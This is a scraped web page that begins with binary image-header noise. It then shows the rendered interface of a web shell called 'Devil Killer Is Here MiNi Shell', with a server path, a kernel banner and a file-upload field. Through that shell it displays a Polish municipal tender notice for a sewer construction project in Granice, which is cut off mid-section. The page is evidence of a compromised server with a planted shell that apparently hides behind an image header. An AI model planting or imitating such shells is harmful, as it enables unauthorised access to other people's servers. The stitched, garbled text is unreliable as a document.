JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210805/0013853401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00138534 z dnia 2021-08-05</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa sieci kanalizacji sanitarnej w ulicy Miłej w miejscowości Granice – etap I </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA TERESIN</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 750148532</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ZIELONA 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Teresin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">96-515</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL926 - Żyrardowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam.publiczne@teresin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.teresin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa sieci kanalizacji sanitarnej w ulicy Miłej w miejscowości Granice – etap I </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c46e8a4c-f5e0-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00138534</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002917/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa sieci kanalizacji sanitarnej w ul. Miłej w miejscowości Granice - I etap</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/pl/profile/gmina-teresin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://josephine.proebiz.com/pl/profile/gmina-teresin</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń,<br/>wniosków, zawiadomień oraz informacji: 1). za pośrednictwem modułu komunikacyjnego systemu<br/>JOSEPHINE, zwanego dalej „Systemem” znajdującego się pod adresem:<br/>https://josephine.proebiz.com/pl/profile/gmina-teresin<br/>lub 2.) za pośrednictwem poczty elektronicznej pod adresem zam.publiczne@teresin.pl. 2.Osoba<br/>upoważniona rejestruje się w systemie JOSEPHINE, wypełniając formularz rejestracyjny na domenie<br/>https://josephine.proebiz.com, postępując w sposób określony w formularzu. Aby bezproblemowo<br/>korzystać z systemu JOSEPHINE, konieczne jest korzystanie z komputera podłączonego do internetu i<br/>przeglądarki internetowej. Szczegółowe informacje dotyczące wymagań technicznych znajdują się pod<br/>adresem https://store.proebiz.com/docs/josephine/pl/Wymagania_techniczne_sw_JOSEPHINE.pdf<br/>Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj. PROEBIZ<br/>s.r.o., Masarykovo náměstí 52/33, CZ - 702 00Ostrava - Moravská Ostrava, C.9176, nr tel. +48 222<br/>139 900, e-mail: houston@proebiz.com od poniedziałku do piątku (dni robocze) w godz. 8.00 – 16.00.<br/>3. Wymagania techniczne dla dokumentów elektronicznych są zawarte w Rozdziale 10 ust. 10 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej RODO, Zamawiający informuje, że:<br/>1) Administratorem danych osobowych Wykonawcy (podwykonawcy lub podmiotu trzeciego) jest<br/>Gmina Teresin, reprezentowana przez Wójta Gminy Teresin z siedzibą, ulica Zielona 20, 96-515<br/>Teresin, z którym można się skontaktować: telefonicznie: +48 (46) 861-38-15, za pośrednictwem<br/>poczty elektronicznej pod adresem e-mail: urzad.gminy@teresin.pl.<br/>2) Administrator wyznaczył Inspektora Ochrony Danych, z którym mogą się Państwo kontaktować we<br/>wszystkich sprawach dotyczących przetwarzania danych osobowych za pośrednictwem poczty<br/>elektronicznej: e-mail: ido.gminy@teresin.pl lub pisemnie na adres Urzędu Gminy Teresin, ul. Zielona<br/>20, 96–515 Teresin z dopiskiem „Inspektor Ochrony Danych”.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust.1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w<br/>trybie podstawowym, a podstawą przetwarzania jest obowiązek prawny stosowania sformalizowanych<br/>procedur udzielania zamówień spoczywających na Zamawiających, zgodnie z ustawą z dnia 11<br/>września 2019 r. Prawo zamówień publicznych, zwaną dalej ustawą P.Z.P.<br/>4) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy PZP.<br/>Szczegółowe informacje zawarte są w Rozdziale 26 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.26.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest budowa sieci kanalizacji sanitarnej wraz z odgałęzieniami w ulicy Miłej w miejscowości Granice o długości 219 mb. (dz. nr ew. 164/9, 164/24, obręb geodezyjny Granice).<br/>Szczegółowy opis przedmiotu zamówienia jest zawarty w dokumentacji projektowej (tj. projekt budowlany – zamienny oraz przedmiar robót – do projektu zamiennego) oraz w specyfikacji technicznej wykonania i odbioru robót budowlanych – do projektu zamiennego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium nr 1 – CENA: Cenę oferty należy podać w ZŁOTYCH<br/>POLSKICH. Podanie ceny w inny sposób spowoduje odrzucenie oferty. Do ceny netto trzeba doliczyć<br/>podatek VAT w określonej właściwymi przepisami prawa wysokości. Wszystkie wartości zamówienia<br/>określone przez Wykonawcę muszą być liczone z dokładnością do dwóch miejsc po przecinku.<br/>Kryterium „Cena” będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu<br/>zamówienia, podanej przez Wykonawcę w formularzu ofertowym. Zamawiający ofercie o najniższej<br/>cenie przyzna 60 punktów (wartość punktowa obliczona z dokładnością do dwóch miejsc po<br/>przecinku), a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza,<br/>według wzoru: Cena = najniższa oferowana cena brutto (zł) / cena badanej oferty brutto (zł) x 60 pkt<br/>Kryterium nr 2 – OKRES GWARANCJI: Kryterium „Okres gwarancji ” będzie rozpatrywane na<br/>podstawie zadeklarowanego przez Wykonawcę w formularzu ofertowym okresu gwarancji. Minimalny<br/>okres gwarancji wynosi 36 miesięcy, licząc od daty odbioru końcowego, maksymalny 60 miesięcy<br/>licząc od daty odbioru końcowego. W przypadku, gdy Wykonawca zadeklaruje dłuższy niż 60<br/>miesięczny okres gwarancji, ocenie będzie podlegał okres 60 miesięczny. Natomiast w przypadku gdy<br/>Wykonawca zadeklaruje krótszy niż 36 miesięczny okres gwarancji, oferta Wykonawcy będzie<br/>podlegała odrzuceniu. Zamawiający ofercie o najdłuższym okresie gwarancji jakości przyzna 40<br/>punktów (wartość punktowa obliczona z dokładnością do dwóch miejsc po przecinku), a każdej<br/>następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/>Okres gwarancji = okres gwarancji badanej oferty / najdłuższy okres gwarancji spośród złożonych ofert<br/>x 40 pkt<br/>Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą liczbę punktów wyliczoną<br/>jako sumę punktów uzyskanych w w/w kryteriach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu dotyczące:<br/>1). sytuacji ekonomicznej lub finansowej:<br/>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową na kwotę równą co najmniej 150.000,00 złotych.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia w/w warunek udziału w postępowaniu może zostać spełniony łącznie.<br/>2). zdolności technicznej lub zawodowej:<br/>a). Wykonawca jest zobowiązany wykazać, że nie wcześniej niż w okresie ostatnich pięciu lat, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał w ramach jednej roboty budowlanej polegającej na budowie (przez budowę należy przez to rozumieć wykonywanie obiektu budowlanego w określonym miejscu, a także odbudowę, rozbudowę, nadbudowę obiektu budowlanego) sieci kanalizacji sanitarnej o łącznej długości nie mniejszej niż 150 mb. Wartość wykazanej roboty budowlanej winna wynosić nie mniej niż 100.000,00 złotych brutto – słownie złotych: sto tysięcy.<br/>Wyżej wymieniony warunek dotyczący doświadczenia i wartości robót dotyczy wykonawcy<br/>składającego ofertę samodzielnie, co najmniej jednego ze wspólników konsorcjum (w przypadku<br/>wspólnej oferty) lub podmiotu udostępniającego zasoby wykonawcy, jeżeli wykonawca powołuje<br/>się na te zasoby.<br/>Nie podlegają sumowaniu wartości robót wykonywanych przez różne podmioty biorące udział w<br/>postępowaniu tj. wspólników konsorcjum, ani wykonawców i podmioty udzielające zasobów.<br/>b). Wykonawca jest zobowiązany wykazać, że dysponuje 1 osobą do pełnienia funkcji<br/>Kierownika Budowy, która będzie uczestniczyła w wykonywaniu zamówienia, legitymująca się<br/>kwalifikacjami zawodowymi odpowiednimi do funkcji, jaka została jej powierzona, tj. posiada<br/>uprawnienia w specjalności instalacyjnej zakresie sieci, instalacji i urządzeń kanalizacyjnych do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami, w zakresie odpowiadającym przedmiotowi zamówienia<br/>wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2020 poz. 1333)<br/>lub odpowiadające im ważne uprawnienia budowlane, uzyskane w oparciu o przepisy<br/>obowiązujące przed wejściem w życie w/w ustawy.<br/>Uwaga: Zamawiający dopuszcza uprawnienia ograniczone dla osoby zadeklarowanej przez<br/>Wykonawcę do pełnienia funkcji Kierownika budowy.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia w/w warunek<br/>udziału w postępowaniu może zostać spełniony łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W przypadku, gdy Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu<br/>powołuje się na zasoby innych podmiotów na zasadach określonych w art. 118 ustawy PZP, jest<br/>zobowiązany do przedstawienia podmiotowych środków dowodowych, które są wymagane od<br/>Wykonawcy z wyjątkiem oświadczenia o którym mowa w art. 108 ust. 1 pkt. 5 ustawy PZP,<br/>dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy<br/>wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełnianie przez Wykonawcę warunków udziału w<br/>postępowania, Wykonawca na wezwanie zamawiającego zobowiązany będzie złożyć następujące<br/>dokumenty i oświadczenia:<br/>1). W zakresie spełnienia warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej:<br/>a). informacji banku lub spółdzielczej kasy oszczędnościowo – kredytowej potwierdzającej wysokość<br/>posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym<br/>niż 3 miesiące przed jej złożeniem.<br/>2). W zakresie spełnienia warunków udziału w postępowaniu dotyczących zdolności technicznej lub<br/>zawodowej:<br/>a). wykazu robót budowlanych, zgodnego ze wzorem zamieszczonym w załączniku nr 5 do SWZ,<br/>wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości,<br/>daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane. Wykonawca<br/>jest zobowiązany załączyć dowody określające, czy te roboty budowlane zostały wykonane należycie,<br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez<br/>podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne dokumenty.<br/>Uwaga: Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonanych<br/>wspólnie z innymi wykonawcami, powyższy wykaz może dotyczyć tylko robót budowlanych w, których<br/>wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>b). wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego i<br/>odpowiedzialnych za kierowanie robotami budowlanymi i spełniających wymagania określone w<br/>Rozdziale 17 SWZ wraz z informacjami na temat ich uprawnień i doświadczenia niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami – zgodnie ze wzorem zamieszczonym w<br/>załączniku nr 6 do SWZ.<br/>c) .oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika,<br/>które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (według załącznika nr<br/>8 do SWZ).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. W terminie składania ofert określonym w Rozdziale 11 SWZ wykonawca zobowiązany jest<br/>złożyć Zamawiającemu Ofertę zawierającą:<br/>1). formularz ofertowy (według załącznika nr 1 do SWZ),<br/>2). oświadczenie własne wykonawcy dotyczące spełniania warunków udziału w postępowaniu<br/>oraz niepodlegania wykluczeniu (według załącznika nr 2 do SWZ);<br/>3). zobowiązanie podmiotu trzeciego albo inny dokument służący wykazaniu udostępnienia<br/>wykonawcy potencjału przez podmiot trzeci (zgodnie z rozdziałem 17 ust. 5 SWZ), jeżeli<br/>wykonawca wykazując spełnienie warunków udziału w postępowaniu polega na zdolnościach lub<br/>sytuacji innych podmiotów,<br/>4). oświadczenie dotyczące spełniania warunków udziału w postępowaniu oraz niepodlegania<br/>wykluczeniu dla każdego z podmiotów na zasobach, których Wykonawca polega (według<br/>załącznika nr 2 do SWZ), o ile wykonawca polega na zasobach innych podmiotów,<br/>5). oświadczenie dotyczące spełniania warunków udziału w postępowaniu oraz niepodlegania<br/>wykluczeniu dla każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia, w<br/>przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (według załącznika<br/>nr 2 do SWZ), o ile oferta jest składana przez wykonawców wspólnie ubiegających się o<br/>zamówienie,<br/>6) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego<br/>wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (według<br/>załącznika nr 8 do SWZ)<br/>7). zobowiązanie podmiotu udostępniającego zasoby (według załącznika nr 7 do SWZ).<br/>2. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania, Zamawiający żąda od wykonawcy dołączenia do oferty odpisu lub informacji z<br/>Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej<br/>lub innego właściwego rejestru.<br/>3. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w ust. 2, jeżeli<br/>Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne, i wykonawca wskaże w oświadczeniu,<br/>o którym mowa w ust.3 pkt.2 dane umożliwiające dostęp do tych dokumentów.<br/>4. Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie<br/>wynika z dokumentów, o których mowa w ust.2, Zamawiający żąda od wykonawcy<br/>pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania<br/>wykonawcy.<br/>5. Wymóg określony w ust.2-4 stosuje się odpowiednio do osoby działającej w imieniu<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.<br/>6. Wymóg określony w ust.2-4 stosuje się odpowiednio do osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby lub podwykonawcy niebędącego podmiotem udostępniającym zasoby<br/>na takich zasadach. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1). Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2). W przypadku 